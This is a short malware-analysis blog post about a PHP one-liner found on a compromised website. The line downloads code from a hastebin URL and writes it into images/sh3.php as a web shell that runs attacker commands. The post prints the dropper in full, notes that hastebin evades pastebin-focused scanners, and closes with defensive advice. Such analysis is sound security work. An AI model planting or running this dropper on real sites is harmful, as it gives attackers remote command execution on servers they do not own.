Short scripts that deliver malware to a website are nothing new, but during a recent investigation we found a script using hastebin[.]com, which is a domain we see used infrequently. The script was found writing malicious contents into an image directory on a compromised website, allowing an attacker to execute other malicious commands.
The attacker was likely leveraging hastebin instead of pastebin since it’s not as frequently used. This obscurity offers some advantages for the attacker, as many security plugins and modules would instead look for links to the more popular pastebin service, flagging them as suspicious.
Here are the contents of the malicious one-liner:
<?php fwrite(fopen(images/sh3.php,w+),file_get_contents(https://hastebin.com/raw/oqikagison)); ?>
Although the attacker appears to have failed to properly inject the malicious code due to some missing single quotes, this is still a good example of how simple and yet powerful a short script of malware can be.
The malware pulls the malicious code from the hastebin URL and writes it into images/sh3.php. The remote code is basically a shell script, using PHP’s “system” call to execute additional commands submitted by the attacker through $_GET requests.
You can see how this one-liner can be added to the bottom of any file and easily missed by a webmaster if they are not trained to look for malware. To properly run, the directory images referenced in the script must exist on the website, but this file name can be effortlessly modified by the attacker at will, allowing the malware to be written to a file within an images directory.
To help mitigate risk, consider using a server-side scanner that scans the website at the server level along with a file integrity monitoring service to notify you of any changes to website files.
